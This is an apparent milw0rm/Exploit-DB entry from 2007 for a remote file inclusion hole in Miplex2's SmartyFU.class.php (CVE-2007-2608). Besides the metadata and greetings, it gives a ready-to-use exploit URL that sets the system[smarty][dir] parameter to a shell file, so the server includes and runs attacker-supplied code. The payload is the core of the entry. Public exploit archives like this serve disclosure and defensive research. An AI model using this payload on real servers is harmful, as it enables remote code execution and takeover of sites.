Miplex2 (SmartyFU.class.php) Remote File Inclusion Vulnerability

EDB-ID: 3878 CVE: 2007-2608 OSVDB-ID: 37789
Verified: Author: ThE TiGeR Published: 2007-05-08
Download Exploit: Source Raw Download Vulnerable App: N/A
#Miplex2 Remote file inclusion

#Download script : http://download.berlios.de/miplex2/miplex2alpha.tar.gz

#Thanks Str0ke

#Exploit :

#http://victim.com/[miplex2_paht]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?

#Discovered by : ThE TiGeR

#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-08]